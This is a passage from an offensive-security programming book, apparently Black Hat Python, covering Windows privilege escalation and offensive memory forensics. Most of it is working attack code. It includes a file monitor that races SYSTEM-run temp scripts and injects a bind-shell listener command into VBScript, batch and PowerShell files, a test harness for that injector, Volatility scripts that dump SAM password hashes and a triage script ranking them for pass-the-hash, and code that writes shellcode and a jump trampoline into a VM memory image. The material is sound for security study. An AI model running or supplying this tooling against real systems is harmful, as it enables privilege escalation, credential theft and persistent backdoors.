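    # notepad as Administrator: SeDebugPrivilege held but disabled (attr 0)
    (660, "JUSTIN-V2TRL6LD\\Administrator",
     [(20, 0), (23, 3), (29, 3), (30, 3)]),
    # a service account that enabled two privileges at runtime (attr 2)
    (1340, "NT AUTHORITY\\NETWORK SERVICE",
     [(23, 3), (29, 2), (17, 2)]),
    # SYSTEM itself is filtered out
    (4, "NT AUTHORITY\\SYSTEM",
     [(20, 3), (29, 3)]),
]

if __name__ == "__main__":
    for pid, owner, names in interesting_processes(SAMPLE_RECORDS):
        print("%d %s %s" % (pid, owner, "|".join(names)))
```

Dropping this into process_monitor.py means calling enabled_privileges on the real GetTokenInformation result and interesting_processes on the records you already log; the only thing to swap out is the offline name lookup.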

Winning the Race
Batch scripts, VBScript, and PowerShell scripts make system administrators' lives easier by automating humdrum tasks. Their purpose can vary from continually registering to a central inventory service to forcing updates of software from their own repositories. One common problem is the lack of proper ACLs on these scripting files. In a number of cases, on otherwise secure servers, I've found batch scripts or PowerShell scripts that are run once a day by the SYSTEM user while being globally writable by any user.
If you run your process monitor long enough in an enterprise (or you simply install the example service provided in the beginning of this chapter), you might see process records that look like this:
20130907233515.914176-300,NT AUTHORITY\SYSTEM,C:\WINDOWS\system32\cscript.exe, C:\WINDOWS\system32\cscript.exe /nologo "C:\WINDOWS\Temp\azndldsddfggg.vbs",1004,4,SeChangeNotifyPrivilege|SeImpersonatePrivilege|SeCreateGlobalPrivilege|
You can see that a SYSTEM process has spawned the cscript.exe binary and passed in the C:\WINDOWS\Temp\azndldsddfggg.vbs parameter. The example service provided should generate these events once per minute. If you do a directory listing, you will not see this file present. What is happening is that the service is creating a random filename, pushing VBScript into the file, and then executing that VBScript. I've seen this action performed by commercial software in a number of cases, and I've seen software that copies files into a temporary location, executes them, and then deletes those files.
In order to exploit this condition, we have to effectively win a race against the executing code. When the software or scheduled task creates the file, we need to be able to inject our own code into the file before the process executes it and then ultimately deletes it. The trick to this is the handy Windows API called ReadDirectoryChangesW, which enables us to monitor a directory for any changes to files or subdirectories. We can also filter these events so that we're able to determine when the file has been "saved" so we can quickly inject our code before it's executed. It can be incredibly useful to simply keep an eye on all temporary directories for a period of 24 hours or longer, because sometimes you'll find interesting bugs or information disclosures on top of potential privilege escalations.
Let's begin by creating a file monitor, and then we'll build on that to automatically inject code. Create a new file called file_monitor.py and hammer out the following:
# Modified example that is originally given here:
# http://timgolden.me.uk/python/win32_how_do_i/watch_directory_for_changes.html
import tempfile
import threading
import win32file
import win32con
import os

# these are the common temp file directories
➊ dirs_to_monitor = ["C:\\WINDOWS\\Temp", tempfile.gettempdir()]

# file modification constants
FILE_CREATED = 1
FILE_DELETED = 2
FILE_MODIFIED = 3
FILE_RENAMED_FROM = 4
FILE_RENAMED_TO = 5

def start_monitor(path_to_watch):
    # we create a thread for each monitoring run
    FILE_LIST_DIRECTORY = 0x0001
➋   h_directory = win32file.CreateFile(
        path_to_watch,
        FILE_LIST_DIRECTORY,
        win32con.FILE_SHARE_READ | win32con.FILE_SHARE_WRITE | win32con.FILE_SHARE_DELETE,
        None,
        win32con.OPEN_EXISTING,
        win32con.FILE_FLAG_BACKUP_SEMANTICS,
        None)

    while 1:
        try:
➌           results = win32file.ReadDirectoryChangesW(
                h_directory,
                1024,
                True,
                win32con.FILE_NOTIFY_CHANGE_FILE_NAME |
                win32con.FILE_NOTIFY_CHANGE_DIR_NAME |
                win32con.FILE_NOTIFY_CHANGE_ATTRIBUTES |
                win32con.FILE_NOTIFY_CHANGE_SIZE |
                win32con.FILE_NOTIFY_CHANGE_LAST_WRITE |
                win32con.FILE_NOTIFY_CHANGE_SECURITY,
                None,
                None
            )
➍           for action, file_name in results:
                full_filename = os.path.join(path_to_watch, file_name)
                if action == FILE_CREATED:
                    print "[ + ] Created %s" % full_filename
                elif action == FILE_DELETED:
                    print "[ - ] Deleted %s" % full_filename
                elif action == FILE_MODIFIED:
                    print "[ * ] Modified %s" % full_filename
                    # dump out the file contents
                    print "[vvv] Dumping contents..."
➎                   try:
                        fd = open(full_filename, "rb")
                        contents = fd.read()
                        fd.close()
                        print contents
                        print "[^^^] Dump complete."
                    except:
                        print "[!!!] Failed."
                elif action == FILE_RENAMED_FROM:
                    print "[ > ] Renamed from: %s" % full_filename
                elif action == FILE_RENAMED_TO:
                    print "[ < ] Renamed to: %s" % full_filename
                else:
                    print "[???] Unknown: %s" % full_filename
        except:
            pass

for path in dirs_to_monitor:
    monitor_thread = threading.Thread(target=start_monitor, args=(path,))
    print "Spawning monitoring thread for path: %s" % path
    monitor_thread.start()
We define a list of directories that we'd like to monitor ➊, which in our case are the two common temporary files directories. Keep in mind that there could be other places you want to keep an eye on, so edit this list as you see fit. For each of these paths, we'll create a monitoring thread that calls the start_monitor function. The first task of this function is to acquire a handle to the directory we wish to monitor ➋. We then call the ReadDirectoryChangesW function ➌, which notifies us when a change occurs. We receive the filename of the target file that changed and the type of event that happened ➍. From here we print out useful information about what happened with that particular file, and if we detect that it's been modified, we dump out the contents of the file for reference ➎.

Kicking the Tires
Open a cmd.exe shell and run file_monitor.py:

C:\> python.exe file_monitor.py

Open a second cmd.exe shell and execute the following commands:

C:\> cd %temp%
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp> echo hello > filetest
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp> rename filetest file2test
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp> del file2test

You should see output that looks like the following:
Spawning monitoring thread for path: C:\WINDOWS\Temp
Spawning monitoring thread for path: c:\docume~1\admini~1\locals~1\temp
[ + ] Created c:\docume~1\admini~1\locals~1\temp\filetest
[ * ] Modified c:\docume~1\admini~1\locals~1\temp\filetest
[vvv] Dumping contents...
hello
[^^^] Dump complete.
[ > ] Renamed from: c:\docume~1\admini~1\locals~1\temp\filetest
[ < ] Renamed to: c:\docume~1\admini~1\locals~1\temp\file2test
[ * ] Modified c:\docume~1\admini~1\locals~1\temp\file2test
[vvv] Dumping contents...
hello
[^^^] Dump complete.
[ - ] Deleted c:\docume~1\admini~1\locals~1\temp\FILE2T~1
If all of the above has worked as planned, I encourage you to keep your file monitor running for 24 hours on a target system. You may be surprised (or not) to see files being created, executed, and deleted. You can also use your process-monitoring script to try to find interesting file paths to monitor as well. Software updates could be of particular interest. Let's move on and add the ability to automatically inject code into a target file.

Code Injection
Now that we can monitor processes and file locations, let's take a look at being able to automatically inject code into target files. The most common scripting languages I've seen employed are VBScript, batch files, and PowerShell. We'll create very simple code snippets that spawn a compiled version of our bhpnet.py tool with the privilege level of the originating service. There is a vast array of nasty things you can do with these scripting languages;[25] we'll create the general framework to do so, and you can run wild from there. Let's modify our file_monitor.py script and add the following code after the file modification constants:
➊ file_types = {}
command = "C:\\WINDOWS\\TEMP\\bhpnet.exe -l -p 9999 -c"

# each entry is [marker, code]; every marker is a complete comment line so that
# the code following it is never swallowed by the comment
file_types['.vbs'] = ["\r\n'bhpmarker\r\n", "\r\nCreateObject(\"Wscript.Shell\").Run(\"%s\")\r\n" % command]
file_types['.bat'] = ["\r\nREM bhpmarker\r\n", "\r\n%s\r\n" % command]
# Start-Process takes the executable and its arguments as separate parameters
file_types['.ps1'] = ["\r\n#bhpmarker\r\n", "\r\nStart-Process -FilePath \"C:\\WINDOWS\\TEMP\\bhpnet.exe\" -ArgumentList \"-l -p 9999 -c\"\r\n"]

# function to handle the code injection
def inject_code(full_filename, extension, contents):
    # is our marker already in the file?
➋   if file_types[extension][0] in contents:
        return
    # no marker; let's inject the marker and code
    full_contents = file_types[extension][0]
    full_contents += file_types[extension][1]
    full_contents += contents
➌   fd = open(full_filename, "wb")
    fd.write(full_contents)
    fd.close()
    print "[\\o/] Injected code."
    return
We start by defining a dictionary of code snippets keyed by file extension ➊; each entry holds a unique marker and the code we want to inject. The reason we use a marker is that otherwise we can get into an infinite loop whereby we see a file modification, we insert our code (which causes a subsequent file modification event), and so forth. This continues until the file gets gigantic and the hard drive begins to cry. Each marker is written as a complete comment line, terminated by a line break; if the marker and the injected command shared a line, the command would simply be part of the comment and never run. The next piece of code is our inject_code function, which handles the actual code injection and file marker checking. After we verify that the marker doesn't exist ➋, we write out the marker and the code we want the target process to run, followed by the file's original contents ➌. Now we need to modify our main event loop to include our file extension check and the call to inject_code.

--snip--
                elif action == FILE_MODIFIED:
                    print "[ * ] Modified %s" % full_filename
                    # dump out the file contents
                    print "[vvv] Dumping contents..."
                    contents = None
                    try:
                        fd = open(full_filename, "rb")
                        contents = fd.read()
                        fd.close()
                        print contents
                        print "[^^^] Dump complete."
                    except:
                        print "[!!!] Failed."
                    #### NEW CODE STARTS HERE
➊                   filename, extension = os.path.splitext(full_filename)
                    # only inject if the read succeeded; a file the writer still
                    # holds open exclusively is picked up on the next event
➋                   if extension in file_types and contents is not None:
                        inject_code(full_filename, extension, contents)
                    #### END OF NEW CODE
--snip--
This is a pretty straightforward addition to our primary loop. We do a quick split of the file extension ➊ and then check it against our dictionary of known file types ➋. If the file extension is detected in our dictionary, we call our inject_code function. Let's take it for a spin.
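Before running it against the live service, it is worth checking the two properties the monitor loop and inject_code depend on: the payload lands ahead of the script's original contents, and the modification event caused by our own write does not trigger a second injection. The following added example (mine, not the book's file_monitor.py) exercises exactly that with a simulated event stream played against a temporary directory, so it runs on any OS without ReadDirectoryChangesW. The listener command, the file names and the event sequence are constructed for the example.

```python
# Added example: marker-guarded injection driven by a simulated stream of
# directory-change events. Stands in for ReadDirectoryChangesW so it runs
# offline; file names, payload command and event order are constructed.
import os
import tempfile

FILE_CREATED, FILE_DELETED, FILE_MODIFIED, FILE_RENAMED_FROM, FILE_RENAMED_TO = 1, 2, 3, 4, 5

COMMAND = "C:\\WINDOWS\\TEMP\\bhpnet.exe -l -p 9999 -c"   # assumed listener path

# Per-extension (marker, payload). Each marker is a whole comment line so the
# payload after it is never swallowed by the comment.
FILE_TYPES = {
    ".vbs": ("\r\n'bhpmarker\r\n",
             "CreateObject(\"Wscript.Shell\").Run(\"%s\")\r\n" % COMMAND),
    ".bat": ("\r\nREM bhpmarker\r\n", "%s\r\n" % COMMAND),
    ".ps1": ("\r\n#bhpmarker\r\n",
             "Start-Process -FilePath \"C:\\WINDOWS\\TEMP\\bhpnet.exe\" "
             "-ArgumentList \"-l -p 9999 -c\"\r\n"),
}


def inject_code(full_filename, extension, contents):
    """Prepend marker + payload unless the marker is already present.

    Returns True when the file was rewritten. The marker test is what stops
    the monitor from re-injecting on the event its own write produces.
    """
    marker, payload = FILE_TYPES[extension]
    if marker.encode() in contents:
        return False
    with open(full_filename, "wb") as fd:
        fd.write(marker.encode() + payload.encode() + contents)
    return True


def handle_event(directory, action, file_name):
    """One iteration of the monitor's event loop.

    Returns 'injected', 'skipped' or None so the outcome is observable.
    """
    full_filename = os.path.join(directory, file_name)
    if action != FILE_MODIFIED:
        return None
    _, extension = os.path.splitext(full_filename)
    if extension not in FILE_TYPES:
        return None
    try:
        with open(full_filename, "rb") as fd:
            contents = fd.read()
    except OSError:
        # the writer may still hold the file exclusively; retry on the next event
        return "skipped"
    return "injected" if inject_code(full_filename, extension, contents) else "skipped"


def simulate(directory):
    """Replay a constructed event stream mimicking the vulnerable service:
    the script is created, written, then modified again (the event our own
    write causes). Returns (outcomes, final file bytes, original bytes)."""
    name = "azndldsddfggg.vbs"
    path = os.path.join(directory, name)
    original = b"WScript.Echo \"hello from the service\"\r\n"
    outcomes = [handle_event(directory, FILE_CREATED, name)]          # nothing to read yet
    with open(path, "wb") as fd:
        fd.write(original)
    outcomes.append(handle_event(directory, FILE_MODIFIED, name))       # first write: inject
    outcomes.append(handle_event(directory, FILE_MODIFIED, name))       # our own write: skip
    outcomes.append(handle_event(directory, FILE_MODIFIED, "notes.txt"))  # unknown extension
    with open(path, "rb") as fd:
        final = fd.read()
    return outcomes, final, original


def run_simulation():
    """Run simulate() inside a throwaway directory and return its results."""
    with tempfile.TemporaryDirectory() as tmp:
        return simulate(tmp)


if __name__ == "__main__":
    outcomes, final, _ = run_simulation()
    print(outcomes)
    print(final.decode())
```

The sequence [None, 'injected', 'skipped', None] is what you want to see: one injection per file, no runaway growth, and no attempt to read a file whose extension we do not handle.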

Kicking the Tires
If you installed the example vulnerable service at the beginning of this chapter, you can easily test your fancy new code injector. Make sure that the service is running, and simply execute your file_monitor.py script. Eventually, you should see output indicating that a .vbs file has been created and modified and that code has been injected. If all went well, you should be able to run the bhpnet.py script from Chapter 2 to connect to the listener you just spawned. To make sure your privilege escalation worked, connect to the listener and check which user you are running as.

justin$ ./bhpnet.py -t 192.168.1.10 -p 9999

whoami
NT AUTHORITY\SYSTEM

This will indicate that you have achieved the holy SYSTEM account and that your code injection worked.
You may have reached the end of this chapter thinking that some of these attacks are a bit esoteric. But the more time you spend inside a large enterprise, the more you'll realize that these are quite viable attacks. The tooling in this chapter can all be easily expanded upon or turned into one-off specialty scripts that you can use in specific cases to compromise a local account or application. WMI alone can be an excellent source of local recon data that you can use to further an attack once you are inside a network. Privilege escalation is an essential piece to any good trojan.
[21] This code was adapted from the Python WMI page (http://timgolden.me.uk/python/wmi/tutorial.html).
[22] Win32_Process class documentation: http://msdn.microsoft.com/en-us/library/aa394372(v=vs.85).aspx
[23] MSDN – Access Tokens: http://msdn.microsoft.com/en-us/library/Aa374909.aspx
[24] For the full list of privileges, visit http://msdn.microsoft.com/en-us/library/windows/desktop/bb530716(v=vs.85).aspx.
[25] Carlos Perez does some amazing work with PowerShell; see http://www.darkoperator.com/.

Chapter 11. Automating Offensive Forensics
Forensics folks are often called in after a breach, or to determine if an "incident" has taken place at all. They typically want a snapshot of the affected machine's RAM in order to capture cryptographic keys or other information that resides only in memory. Lucky for them, a team of talented developers has created an entire Python framework suitable for this task called Volatility, billed as an advanced memory forensics framework. Incident responders, forensic examiners, and malware analysts can use Volatility for a variety of other tasks as well, including inspecting kernel objects, examining and dumping processes, and so on. We, of course, are more interested in the offensive capabilities that Volatility provides.
We first explore using some of the command-line capabilities to retrieve password hashes from a running VMware virtual machine, and then show how we can automate this two-step process by including Volatility in our scripts. The final example shows how we can inject shellcode directly into a running VM at a precise location that we choose. This technique can be useful to nail those paranoid users who browse or send emails only from a VM. We can also leave a backdoor hidden in a VM snapshot that will be executed when the administrator restores the VM. This code injection method is also useful for running code on a computer that has a FireWire port that you can access but which is locked or asleep and requires a password. Let's get started!

Installation
Volatility is extremely easy to install; you just need to download it from https://code.google.com/p/volatility/downloads/list. I typically don't do a full installation. Instead, I keep it in a local directory and add the directory to my working path, as you'll see in the following sections. A Windows installer is also included. Choose the installation method of your choice; it should work fine whatever you do.

Profiles
Volatility uses the concept of profiles to determine how to apply necessary signatures and offsets to pluck information out of memory dumps. But if you can retrieve a memory image from a target via FireWire or remotely, you might not necessarily know the exact version of the operating system you're attacking. Thankfully, Volatility includes a plugin called imageinfo that attempts to determine which profile you should use against the target. You can run the plugin like so:

$ python vol.py imageinfo -f "memorydump.img"

After you run it, you should get a good chunk of information back. The most important line is the Suggested Profiles line, which should look something like this:

Suggested Profile(s) : WinXPSP2x86, WinXPSP3x86

When you're performing the next few exercises on a target, you should set the command-line flag --profile to the appropriate value shown, starting with the first one listed. In the above scenario, we'd use (with plugin and arguments replaced by the plugin name and its arguments):

$ python vol.py plugin --profile="WinXPSP2x86" arguments

You'll know if you set the wrong profile because none of the plugins will function properly, or Volatility will throw errors indicating that it couldn't find a suitable address mapping.

Grabbing Password Hashes
Recovering the password hashes on a Windows machine after penetration is a common goal among attackers. These hashes can be cracked offline in an attempt to recover the target's password, or they can be used in a pass-the-hash attack to gain access to other network resources. Looking through the VMs or snapshots on a target is a perfect place to attempt to recover these hashes.
Whether the target is a paranoid user who performs high-risk operations only on a VM or an enterprise attempting to contain some of its users' activities to VMs, the VMs present an excellent point to gather information after you've gained access to the host hardware.
Volatility makes this recovery process extremely easy. First, we'll take a look at how to operate the necessary plugins to retrieve the offsets in memory where the password hashes can be retrieved, and then retrieve the hashes themselves. Then we'll create a script to combine this into a single step.
Windows stores local passwords in the SAM registry hive in a hashed format, and those hashes are protected with the boot key (syskey), which is stored in the system registry hive. We need both of these hives in order to extract the hashes from a memory image. To start, let's run the hivelist plugin to make Volatility extract the offsets in memory where these two hives live. Then we'll pass this information off to the hashdump plugin to do the actual hash extraction. Drop into your terminal and execute the following command:

$ python vol.py hivelist --profile=WinXPSP2x86 -f "WindowsXPSP2.vmem"

After a minute or two, you should be presented with some output displaying where those registry hives live in memory. I clipped out a portion of the output for brevity's sake.
Virtual    Physical   Name
---------- ---------- ----
0xe1666b60 0x0ff01b60 \Device\HarddiskVolume1\WINDOWS\system32\config\software
0xe1673b60 0x0fedbb60 \Device\HarddiskVolume1\WINDOWS\system32\config\SAM
0xe1455758 0x070f7758 [no name]
0xe1035b60 0x06cd3b60 \Device\HarddiskVolume1\WINDOWS\system32\config\system
In the output, you can see the virtual and physical memory offsets of both the SAM and system hives (the lines ending in \SAM and \system). Keep in mind that the virtual offset deals with where in memory, in relation to the operating system, those hives exist. The physical offset is the location in the actual .vmem file on disk where those hives exist. Now that we have the SAM and system hives, we can pass the virtual offsets to the hashdump plugin: -y takes the system hive offset and -s the SAM hive offset. Go back to your terminal and enter the following command, noting that your virtual addresses will be different than the ones I show.

$ python vol.py hashdump -d -d -f "WindowsXPSP2.vmem" --profile=WinXPSP2x86 -y 0xe1035b60 -s 0xe1673b60

Running the above command should give you results much like the ones below:

Administrator:500:74f77d7aaaddd538d5b79ae2610dd89d4c:537d8e4d99dfb5f5e92e1fa377041b27:::
Guest:501:aad3b435b51404ad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:bf57b0cf30812c924kdkkd68c99f0778f7:457fbd0ce4f6030978d124j272fa653:::
SUPPORT_38894df:1002:aad3b435221404eeaad3b435b51404ee:929d92d3fc02dcd099fdaecfdfa81aee:::

Perfect! We can now send the hashes off to our favorite cracking tools or use them in a pass-the-hash attack to authenticate to other services.
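Not every line a hashdump produces is worth feeding to a cracker, and the format carries two signals that decide what to do next. The following added example (mine, not from the book or from Volatility) parses "user:rid:lm:nt:::" lines, rejects malformed ones, and triages the rest: an LM field equal to aad3b435b51404eeaad3b435b51404ee means no LM hash is stored, an NT field equal to 31d6cfe0d16ae931b73c59d7e0c089c0 is the NT hash of the empty password (both are the well-known constants), and any other NT hash is directly usable for pass-the-hash. The sample lines are constructed for the example; the svc_backup NT hash is the widely published NT hash of "password", the other hex values are arbitrary.

```python
# Added example: parse and triage pwdump/hashdump-style output offline.
# Sample lines are constructed, not dumped from a real image.
import re

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # "no LM hash stored"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of the empty password
HEX32 = re.compile(r"^[0-9a-f]{32}$")


def parse_hashdump(text):
    """Return (entries, bad_lines).

    Malformed lines are reported rather than silently dropped, because a
    garbled hash will never crack and should be re-dumped instead.
    """
    entries, bad = [], []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        parts = line.split(":")
        if len(parts) < 4:
            bad.append(line)
            continue
        user, rid, lm, nt = parts[0], parts[1], parts[2].lower(), parts[3].lower()
        if not rid.isdigit() or not HEX32.match(lm) or not HEX32.match(nt):
            bad.append(line)
            continue
        entries.append({
            "user": user,
            "rid": int(rid),
            "lm": lm,
            "nt": nt,
            "lm_stored": lm != EMPTY_LM,
            "empty_password": nt == EMPTY_NT,
        })
    return entries, bad


def triage(entries):
    """Sort accounts by what they give an attacker.

    blank_password: log in directly, nothing to crack.
    lm_hash_present: LM is case-folded and split into two 7-char halves, so
                     it cracks in hours; recover it before touching NT.
    pass_the_hash:   any non-empty NT hash authenticates as-is over NTLM.
    """
    blank = [e["user"] for e in entries if e["empty_password"]]
    lm = [e["user"] for e in entries if e["lm_stored"]]
    pth = ["%s:%s" % (e["user"], e["nt"]) for e in entries if not e["empty_password"]]
    return {"blank_password": blank, "lm_hash_present": lm, "pass_the_hash": pth}


# Constructed sample (assumption: not real credentials from any system).
SAMPLE = """\
Administrator:500:7a21990fcd3d759941e45c490f143d5f:e19ccf75ee54e06b06a5907af13cef42:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1005:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
HelpAssistant:1000:notahash:alsonotahash:::
"""

if __name__ == "__main__":
    entries, bad = parse_hashdump(SAMPLE)
    for category, users in triage(entries).items():
        print("%-16s %s" % (category, ", ".join(users)))
    for line in bad:
        print("rejected: %s" % line)
```

On the book's own output above, the Guest line (empty NT hash) would land in blank_password and the Administrator line, which carries a real LM hash, in lm_hash_present.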
Now let's take this two-step process and streamline it into our own standalone script. Crack open grabhashes.py and enter the following code:
import sys
import struct

➊ memory_file = "WindowsXPSP2.vmem"
# the download path must be on sys.path before the volatility imports below
➋ sys.path.append("/Users/justin/Downloads/volatility-2.3.1")

import volatility.conf as conf
import volatility.registry as registry

registry.PluginImporter()
config = conf.ConfObject()

import volatility.commands as commands
import volatility.addrspace as addrspace

config.parse_options()
config.PROFILE = "WinXPSP2x86"
config.LOCATION = "file://%s" % memory_file

registry.register_global_options(config, commands.Command)
registry.register_global_options(config, addrspace.BaseAddressSpace)
First we set a variable to point to the memory image ➊ that we're going to analyze. Next we include our Volatility download path ➋ so that our code can successfully import the Volatility libraries. The rest of the supporting code is just to set up our instance of Volatility with profile and configuration options set as well.
Now let's plumb in our actual hash-dumping code. Add the following lines to grabhashes.py.
from volatility.plugins.registry.registryapi import RegistryApi
from volatility.plugins.registry.lsadump import HashDump

# named regapi so it does not shadow the volatility.registry module imported above
➊ regapi = RegistryApi(config)
➋ regapi.populate_offsets()

sam_offset = None
sys_offset = None

for offset in regapi.all_offsets:
➌   if regapi.all_offsets[offset].endswith("\\SAM"):
        sam_offset = offset
        print "[*] SAM: 0x%08x" % offset

➍   if regapi.all_offsets[offset].endswith("\\system"):
        sys_offset = offset
        print "[*] System: 0x%08x" % offset

    if sam_offset is not None and sys_offset is not None:
➎       config.sys_offset = sys_offset
        config.sam_offset = sam_offset

➏       hashdump = HashDump(config)

➐       for hash_line in hashdump.calculate():
            print hash_line

        break

if sam_offset is None or sys_offset is None:
    print "[*] Failed to find the system or SAM offsets."
We first instantiate a new instance of RegistryApi ➊, a helper class with commonly used registry functions; it takes only the current configuration as a parameter. The populate_offsets call ➋ then performs the equivalent of running the hivelist command that we previously covered. Next, we start walking through each of the discovered hives looking for the SAM ➌ and system ➍ hives. When they're discovered, we update the current configuration object with their respective offsets ➎. Then we create a HashDump object ➏ and pass in the current configuration object. The final step ➐ is to iterate over the results from the calculate function call, which produces the actual usernames and their associated hashes.
Now run this script as a standalone Python file:

$ python grabhashes.py

You should see the same output as when you ran the two plugins independently. One tip I suggest is that as you look to chain functionality together (or borrow existing functionality), grep through the Volatility source code to see how they're doing things under the hood. Volatility isn't a Python library like Scapy, but by examining how the developers use their code, you'll see how to properly use any classes or functions that they expose.
Now let's move on to some simple reverse engineering, as well as targeted code injection to infect a virtual machine.

Direct Code Injection
Virtualization technology is being used more and more frequently as time goes on, whether because of paranoid users, cross-platform requirements for office software, or the concentration of services onto beefier hardware systems. In each of these cases, if you've compromised a host system and you see VMs in use, it can be handy to climb inside them. If you also see VM snapshot files lying around, they can be a perfect place to implant shellcode as a method for persistence. If a user reverts to a snapshot that you've infected, your shellcode will execute and you'll have a fresh shell.
Part of performing code injection into the guest is that we need to find an ideal spot to inject the code. If you have the time, a perfect place is to find the main service loop in a SYSTEM process because you're guaranteed a high level of privilege on the VM and that your shellcode will be called. The downside is that if you pick the wrong spot, or your shellcode isn't written properly, you could corrupt the process and get caught by the end user or kill the VM itself.
We're going to do some simple reverse engineering of the Windows calculator application as a starting target. The first step is to load up calc.exe in Immunity Debugger[26] and write a simple code coverage script that helps us find the = button function. The idea is that we can rapidly perform the reverse engineering, test our code injection method, and easily reproduce the results. Using this as a foundation, you could progress to finding trickier targets and injecting more advanced shellcode. Then, of course, find a computer that supports FireWire and try it out there!
Let's get started with a simple Immunity Debugger PyCommand. Open a new file on your Windows XP VM and name it codecoverage.py. Make sure to save the file in the main Immunity Debugger installation directory under the PyCommands folder.
from immlib import *

class cc_hook(LogBpHook):
    def __init__(self):
        LogBpHook.__init__(self)
        self.imm = Debugger()

    def run(self, regs):
        # log the address that was hit, then remove the breakpoint so each
        # function is reported only once
        self.imm.log("%08x" % regs['EIP'], regs['EIP'])
        self.imm.deleteBreakpoint(regs['EIP'])
        return

def main(args):
    imm = Debugger()
    calc = imm.getModule("calc.exe")
    imm.analyseCode(calc.getCodebase())
    functions = imm.getAllFunctions(calc.getCodebase())

    hooker = cc_hook()
    for function in functions:
        hooker.add("%08x" % function, function)

    return "Tracking %d functions." % len(functions)
This is a simple script that finds every function in calc.exe and for each one sets a one-shot breakpoint. This means that for every function that gets executed, Immunity Debugger outputs the address of the function and then removes the breakpoint so that we don't continually log the same function addresses. Load calc.exe in Immunity Debugger, but don't run it yet. Then in the command bar at the bottom of Immunity Debugger's screen, enter:

!codecoverage

Now you can run the process by pressing the F9 key. If you switch to the Log View (ALT-L), you'll see functions scroll by. Now click as many buttons as you want, except the = button. The idea is that you want to execute everything but the one function you're looking for. After you've clicked around enough, right-click in the Log View and select Clear Window. This removes all of your previously hit functions. You can verify this by clicking a button you previously clicked; you shouldn't see anything appear in the log window. Now let's click that pesky = button. You should see only a single entry in the log screen (you might have to enter an expression like 3+3 and then hit the = button). On my Windows XP SP2 VM, this address is 0x01005D51.
All right! Our whirlwind tour of Immunity Debugger and some basic code coverage techniques is over and we have the address where we want to inject code. Let's start writing our Volatility code to do this nasty business.
This is a multistage process. We first need to scan memory looking for the calc.exe process and then hunt through its memory space for a place to inject the shellcode, as well as to find the physical offset in the RAM image that contains the function we previously found. We then have to insert a small jump over the function address for the = button that jumps to our shellcode and executes it. The shellcode we use for this example is from a demonstration I did at a fantastic Canadian security conference called CounterMeasure. This shellcode is using hardcoded offsets, so your mileage may vary.[27]
Open a n ew f ile , n am e i t
co de_ in je ct.p y
, a nd h am mer o ut th e f o llo w in g c o de.
# Python 2 script: Volatility 2.3.1 does not run on Python 3
import sys
import struct

equals_button = 0x01005D51          # address of calc's = button handler found above
memory_file = "WinXPSP2.vmem"       # RAM image of the suspended VM
slack_space = None                  # virtual address where the shellcode will land
trampoline_offset = None            # physical offset of the = handler inside the image

# read in our shellcode
sc_fd = open("cmeasure.bin", "rb")  # ➊
sc = sc_fd.read()
sc_fd.close()

sys.path.append("/Users/justin/Downloads/volatility-2.3.1")

import volatility.conf as conf
import volatility.registry as registry

registry.PluginImporter()
config = conf.ConfObject()

import volatility.commands as commands
import volatility.addrspace as addrspace

registry.register_global_options(config, commands.Command)
registry.register_global_options(config, addrspace.BaseAddressSpace)

config.parse_options()
config.PROFILE = "WinXPSP2x86"
config.LOCATION = "file://%s" % memory_file
This setup code is identical to the previous code you wrote, with the exception that we're reading in the shellcode ➊ that we will inject into the VM.

Now let's put the rest of the code in place to actually perform the injection.
import volatility.plugins.taskmods as taskmods

p = taskmods.PSList(config)                                   # ➊ process-list plugin
for process in p.calculate():                                 # ➋ one _EPROCESS per process
    if str(process.ImageFileName) == "calc.exe":
        print "[*] Found calc.exe with PID %d" % process.UniqueProcessId
        print "[*] Hunting for physical offsets...please wait."

        address_space = process.get_process_address_space()   # ➌ calc's virtual address space
        pages = address_space.get_available_pages()           # ➍ (virtual address, size) pairs
We first instantiate a new PSList class ➊ and pass in our current configuration. The PSList module is responsible for walking through all of the running processes detected in the memory image. We iterate over each process ➋ and if we discover a calc.exe process, we obtain its full address space ➌ and all of the process's memory pages ➍.

Now we're going to walk through the memory pages to find a chunk of memory the same size as our shellcode that's filled with zeros. As well, we're looking for the virtual address of our = button handler so that we can write our trampoline. Enter the following code, being mindful of the indentation.
        # this loop sits inside the if block that found calc.exe
        for page in pages:
            physical = address_space.vtop(page[0])            # ➊ offset of this page in the .vmem file

            if physical is not None:

                if slack_space is None:
                    fd = open(memory_file, "r+")              # ➋
                    fd.seek(physical)
                    buf = fd.read(page[1])

                    try:
                        # a run of NULLs big enough to hold the whole shellcode
                        offset = buf.index("\x00" * len(sc))  # ➌
                        slack_space = page[0] + offset

                        print "[*] Found good shellcode location!"
                        print "[*] Virtual address: 0x%08x" % slack_space
                        print "[*] Physical address: 0x%08x" % (physical + offset)
                        print "[*] Injecting shellcode."

                        fd.seek(physical + offset)            # ➍
                        fd.write(sc)
                        fd.flush()

                        # create our trampoline: mov ebx, slack_space ; jmp ebx
                        tramp = "\xbb%s" % struct.pack("<I", slack_space)   # ➎
                        tramp += "\xff\xe3"
                    except ValueError:
                        # no NULL run of that size in this page; try the next one
                        pass

                    fd.close()

                    if slack_space is not None and trampoline_offset is not None:
                        break

                # check for our target code location; all 7 trampoline bytes
                # must lie inside this single page
                if page[0] <= equals_button and equals_button < ((page[0] + page[1]) - 7):   # ➏
                    print "[*] Found the page holding our target at: 0x%08x" % physical

                    # calculate virtual offset
                    v_offset = equals_button - page[0]        # ➐

                    # now calculate physical offset
                    trampoline_offset = physical + v_offset
                    print "[*] Found our trampoline target at: 0x%08x" % trampoline_offset

                    if slack_space is not None:
                        break

if slack_space is None or trampoline_offset is None:
    print "[!] Could not find both a shellcode location and the target; nothing written."
    sys.exit(1)

print "[*] Writing trampoline..."
fd = open(memory_file, "r+")                                  # ➑
fd.seek(trampoline_offset)
fd.write(tramp)
fd.close()

print "[*] Done injecting code."
